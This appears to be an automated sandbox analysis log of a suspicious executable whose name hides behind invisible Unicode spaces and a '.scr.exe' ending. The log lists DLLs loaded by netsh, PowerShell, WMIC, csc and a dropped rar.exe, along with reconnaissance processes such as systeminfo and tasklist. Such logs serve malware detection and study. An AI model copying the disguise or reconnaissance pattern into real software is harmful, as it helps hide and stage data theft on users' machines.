Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: #U202f#U202f#U2005#U00a0.scr.exe Static file information: File size 8505922 > 1048576
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion 